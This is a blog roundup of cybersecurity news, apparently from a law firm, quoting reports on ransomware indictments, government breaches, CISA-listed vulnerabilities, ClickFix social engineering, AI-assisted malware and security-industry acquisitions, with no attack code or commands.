Cybersecurity Dive - Ermer and Suter PLLC

From the cybersecurity policy and law enforcement front,

Cyberscoop reports,
- “Congressional leaders are pressing federal agencies to provide more information on their plans to compete with China on a range of tech and cybersecurity issues, including a strategy for promoting American 6G telecommunications infrastructure and limiting Chinese tech in US supply chains.
- “Representative Raja Krishnamoorthi, D-Ill., ranking member on the House Select Committee on the Chinese Communist Party, wrote to Secretary of State Marco Rubio last week asking for an update on the department’s work building international coalitions around 6G.
- “In the letter, dated Oct. 30 and shared exclusively with CyberScoop, he called for the department to share details on how it is fighting to shape international norms, global technical standards and supply chains in favor of U.S. and non-Chinese companies and technologies, saying “diplomacy can, and must, play a key role in this strategy.”
- “While it remains essential that we continue to address the threats posed by the Chinese Communist Party’s efforts to dominate 5G, we must also look forward to how we can outcompete the CCP in the next frontier of wireless competition,” he wrote.”

HIPAA Journal tells us,
- “Two U.S. nationals have recently been indicted for using BlackCat ransomware to attack targets in the United States. A third individual is suspected of involvement but was not included in the indictment. All three individuals worked at cybersecurity companies and conducted the attacks while they were employed there.
- “Ryan Clifford Goldberg was employed by the cybersecurity firm Sygnia as an incident response professional, and Kevin Tyler Martin and an unnamed co-conspirator were both employed by the Chicago-based cyber threat intelligence and incident response firm DigitalMint as ransomware threat negotiators.
- “The two indicted individuals are alleged to have engaged in a conspiracy to enrich themselves by breaching company networks, stealing their data, using ransomware to encrypt files, and extorting the companies to obtain cryptocurrency payments. A medical device company was attacked on or around May 13, 2023, resulting in a $10 million ransom demand. The medical device company negotiated and paid a $1,274,000 ransom payment.
- “A pharmaceutical company was also attacked in May 2023, but the ransom demand was not disclosed. Then came a July 2023 attack on a doctor’s office in California, which included a $5,000,000 ransom demand. In October 2023, an engineering company was attacked and told to pay $1 million, then in November 2023, a drone manufacturer in Virginia was attacked, and the defendants allegedly demanded a $300,000 ransom payment. Only the medical device company paid the ransom.”

Cyberscoop adds,
- “A 25-year-old Russian national pleaded guilty to multiple charges stemming from their participation in ransomware attacks and faces a maximum penalty up to 53 years in prison.
- “Aleksei Olegovich Volkov, also known as “chubaka.kor,” served as the initial access broker for the Yanluowang ransomware group while living in Russia from July 2021 through November 2022, according to court records. Prosecutors accuse Volkov and unnamed co-conspirators of attacking seven U.S. businesses during that period, including two that paid a combined $1.5 million in ransoms.
- “The victims, which included an engineering firm and a bank, said executives received harassing phone calls and their networks were hit with distributed denial of service attacks after their data was stolen and encrypted by Yanluowang ransomware operators.”

From the cybersecurity breaches and vulnerabilities front,

Cyberscoop reports,
- “A federal agency that supplies budget and economic information to Congress has suffered a cybersecurity incident, reportedly at the hands of a suspected foreign party.
- “A spokesperson for the Congressional Budget Office (CBO) acknowledged the incident Thursday [November 6] after The Washington Post reported that the office was hacked, with the attackers potentially accessing communications between lawmakers and researchers at the agency.
- “The Congressional Budget Office has identified the security incident, has taken immediate action to contain it, and has implemented additional monitoring and new security controls to further protect the agency’s systems going forward,” said the CBO spokesperson, Caitlin Emma.”
and
- “SonicWall said a state-sponsored threat actor was behind the brute-force attack that exposed firewall configuration files of every customer that used the company’s cloud backup service.
- The vendor pinned the responsibility for the attack on an undisclosed nation state Tuesday, after Mandiant concluded its investigation into the incident.
- “SonicWall did not attribute the attack to a specific country or threat group and Mandiant declined to provide additional information. The vendor’s update, which lacked a root-cause analysis, was mostly an effort to put the attack behind it as leadership made pledges to improve SonicWall’s security practices.”

The Cybersecurity and Infrastructure Security Agency added two known exploited vulnerabilities to its catalog this week.
- November 4, 2025
  - CVE-2025-11371 Gladinet CentreStack and Triofox Files or Directories Accessible to External Parties Vulnerability
  - CVE-2025-48703 CWP Control Web Panel OS Command Injection Vulnerability
    - The Hacker News discusses these KVEs here.

Cybersecurity Dive informs us,
- “Critical flaws in Microsoft Teams can be used to allow an attacker to manipulate messages, spoof notifications and even impersonate executives, according to a report released Tuesday by Check Point Research.
- ‘Researchers found four vulnerabilities that allow attackers, including external hackers and malicious insiders, to manipulate Teams messages, conduct business email compromise or forge identities in video calls or phone messages.
- “Researchers found that attackers could conduct four specific types of attacks:
  - “Attackers could edit Teams messages without leaving the “edited” label behind in the message.
  - “Message notifications could be manipulated so that they appeared to be from another sender.
  - “Attackers could change the display name inside private chats.
  - “Caller identities could be altered in video and audio calls.”
and
- “A critical vulnerability in Cisco IOS XE is being exploited to install an implant called BadCandy in a renewed wave of attacks, according to warnings from Australian government authorities and multiple security researchers.
- “State-linked and criminal hackers have been abusing the vulnerability, tracked as CVE-2023-20198, to install BadCandy in targeted systems since 2023, and have periodically renewed those attacks in waves.” * * *
- “Shadowserver Foundation on Monday warned that threat activity is widespread across the globe, with more than 15,000 devices with backdoor implants remaining visible.”
- “The vulnerability, tracked as CVE-2023-20198, abuses the web user interface in Cisco IOS XE software and has a severity score of 10. It was previously disclosed as a zero-day in 2023, with more than 42,000 devices exploited.”
Security Week lets us know,
- “ClickFix attacks continue to evolve and the technique appears to be increasingly used against macOS users, with lures becoming ever more convincing.
- “ClickFix has been widely adopted by both profit-driven cybercriminals and state-sponsored threat groups.
- ‘The social engineering tactic enables attackers to trick victims into inadvertently executing malicious commands, particularly ones that lead to the deployment of malware.
- “An attack involves a fake error message being displayed, informing the targeted user that in order to ‘fix’ the issue they need to click on a button and execute a series of operations.
- “When the user clicks the ‘fix’ or ‘verify’ button in the prompt, a malicious command is copied in the background to their clipboard.
- ‘On Windows, the victim is then instructed to press the Windows+R keys, which opens the Windows Run dialog box, then press Ctrl+V, which pastes the malicious command from the clipboard into the box, and finally press Enter to execute the command. The command typically runs silently in the background (often by leveraging a legitimate Windows utility such as PowerShell), downloading and installing a piece of malware.”

Per Cybersecurity Dive,
- “Energy, healthcare, government and transportation saw the biggest surges in cyberattacks targeting Android devices between June 2024 and May 2025, the security firm Zscaler said in a report published on Wednesday.
- “Agriculture, IT and education saw some of the biggest drops in attacks on Android devices, according to the report.
- “Manufacturing, which also saw a significant increase in 2025, accounted for 26% of all cyberattacks on Android devices that Zscaler tracked.”
and
- “Identity-related risks are the biggest danger facing enterprises’ cloud environments, according to a report that ReliaQuest published on Tuesday.
- “Forty-four percent of valid alerts from cloud security tools “were rooted in identity-related weaknesses,” ReliaQuest said, while 33% of all alerts related to identity.
- “Hackers prefer identity-based attacks because they rely on credentials available for cheap on the dark web, they can evade many detection tools and there are so many identities ripe for impersonation, according to the report.”
and
- “Cyber threat actors have recently begun using AI to develop malware, in a dramatic evolution of the technology’s role in the hacking ecosystem, Google said on Wednesday.
- “New strains of malware use AI to grow and change in real time during the attack phase, potentially making detection and defense much more difficult, Google’s threat intelligence researchers said in a report.
- “The recent trend represents the latest phase in an AI arms race between attackers and defenders.”

Help Net Security adds,
- “Security leaders are staring down a year of major change. In its Cybersecurity Forecast 2026, Google paints a picture of a threat landscape transformed by AI, supercharged cybercrime, and increasingly aggressive nation-state operations. Attackers are moving faster, scaling their operations with automation.
- “By 2026, AI will be a normal part of everyday attack and defense activity. Adversaries are already using it to automate phishing, clone voices, and shape disinformation.
- “One of the fastest-growing threats is prompt injection, which manipulates AI systems to ignore safeguards and carry out hidden commands. As more companies deploy LLMs inside business processes, these attacks are becoming easier to launch and harder to detect.” * * *
- “The report notes a growing reliance on AI agents, systems that act on their own to complete tasks. These agents will need distinct digital identities and strict access controls. Security programs built for human users will not be enough. Identity management will have to account for AI-driven decision making and temporary task-based privileges.
- “AI is also reshaping security operations. Analysts will soon direct AI tools rather than manually sort through alerts. Instead of reviewing logs, they will examine case summaries and confirm automated containment steps. This shift enables faster response but also brings new oversight challenges.”

From the ransomware front,

Cybersecurity Dive reports,
- “An August ransomware attack against the state of Nevada has been traced to a May intrusion, when a state employee mistakenly downloaded a malware-laced tool from a spoofed website, according to a forensic report the state released Wednesday.
- “State officials refused to submit to a ransom demand and recovered 90% of the impacted data after a 28-day recovery period. The state had insurance coverage and pre-negotiated vendor agreements, which factored into the decision not to pay a ransom.
- “The threat actor deployed an attack aimed at taking state systems offline and left behind a note with instructions on how to recover the encrypted systems and data, in an attempt to extort the state,” Timothy Galluzzi, chief information officer and executive director of the Governor’s Technology Office, said in the report.” * * *
- “The threat actor, whom the report did not identify, gained access to more than 26,400 files. Another 3,200 files were left exposed across multiple systems. The state incurred about $1.3 million in expenses related to recovery costs, as they engaged several major companies to help investigate and restore agency services, including Mandiant, Dell, Microsoft DART, Palo Alto Networks, Aeris and other firms.”
TechCrunch informs us,
- “The Washington Post has said that it was one of the victims of a hacking campaign tied to Oracle’s suite of corporate software apps.
- “Reuters first reported the news on Friday [November 7], citing a statement from the newspaper that said it was affected “by the breach of the Oracle E-Business Suite platform.”
- “A spokesperson for the Post did not immediately respond to TechCrunch’s request for comment.” * * *
- “On Thursday [November 6], Clop claimed on its website that it had hacked The Washington Post, claiming that the company “ignored their security,” language that the Clop gang typically uses when the victim does not pay the hackers.
- “It’s not uncommon for ransomware or extortion gangs like Clop to publicize the names and stolen files of their victims as a pressure tactic, which can suggest that the victim has not negotiated a payment with the gang, or the negotiation broke down.
- ‘Several other organizations have confirmed they are affected by the Oracle E-Business hacks, including Harvard University and American Airlines subsidiary Envoy.”

The Hackers News tells us,
- “Cybersecurity researchers have flagged a malicious Visual Studio Code (VS Code) extension with basic ransomware capabilities that appears to be created with the help of artificial intelligence – in other words, vibe-coded.
- Secure Annex researcher John Tuckner, who flagged the extension “susvsex,” said it does not attempt to hide its malicious functionality. The extension was uploaded on November 5, 2025, by a user named “suspublisher18” along with the description “Just testing” and the email address “donotsupport@example[.]com.”
- “Automatically zips, uploads, and encrypts files from C:\Users\Public\testing (Windows) or /tmp/testing (macOS) on first launch,” reads the description of the extension. As of November 6, Microsoft has stepped in to remove it from the official VS Code Extension Marketplace.

Tech Radar points out,
- “[Ransomware gang] Rhysida spoofed Microsoft Teams ads on Bing to deliver malware via fake download pages
- “Victims received OysterLoader and Latrodectus, which deploy ransomware, backdoors, and infostealers
- “Group operates on RaaS model; past targets include airports, libraries, and U.S. school districts.”

From the cybersecurity business and defenses front,

Cyberscoop reports,
- “Cloud security company Zscaler [November 3] announced Monday it has acquired SplxAI, an artificial intelligence security platform, in a move to strengthen its ability to protect enterprise AI assets.
- “Terms were not disclosed.
- “Zscaler said the purchase is aimed at enhancing its zero-trust security offerings by integrating Splx’s technology for AI asset discovery, automated red-teaming, and governance. The company said these features will help secure AI applications and services during development and after deployment.
- “AI is creating enormous value, but its full potential can only be realized when it can be secured,” Zscaler CEO Jay Chaudhry said in a statement.”

Security Week adds,
- “Google and Wiz said the antitrust review initiated by the United States Department of Justice into their planned $32 billion acquisition has been cleared.
- “The companies announced reaching an agreement on the terms of an acquisition in March 2025.
- “News of a Justice Department antitrust review into Google’s planned acquisition of the cloud security giant came to light in mid-June. The goal of the probe was to determine whether the deal would harm competition in the cybersecurity market.
- “During the recent WSJ Tech Live California event, Wiz CEO Assaf Rappaport confirmed that his company had cleared the regulatory hurdle, noting they are “still in the journey between signing and closing.”

Dark Reading offers a commentary about “Closing the AI Execution Gap in Cybersecurity — A CISO Framework. CISOs must navigate five critical dimensions of AI in cybersecurity: augmenting security with AI, automating security with AI, protecting AI systems, defending against AI-powered threats, and aligning AI strategies with business goals. Neglecting any of these areas is a recipe for disaster.”

Here’s a link to Dark Reading’s CISO Corner.

Cookie	Duration	Description
cookielawinfo-checbox-analytics	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Analytics".
cookielawinfo-checbox-functional	11 months	The cookie is set by GDPR cookie consent to record the user consent for the cookies in the category "Functional".
cookielawinfo-checbox-others	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Other.
cookielawinfo-checkbox-necessary	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookies is used to store the user consent for the cookies in the category "Necessary".
cookielawinfo-checkbox-performance	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Performance".
viewed_cookie_policy	11 months	The cookie is set by the GDPR Cookie Consent plugin and is used to store whether or not user has consented to the use of cookies. It does not store any personal data.

Subscribe to FEHBlog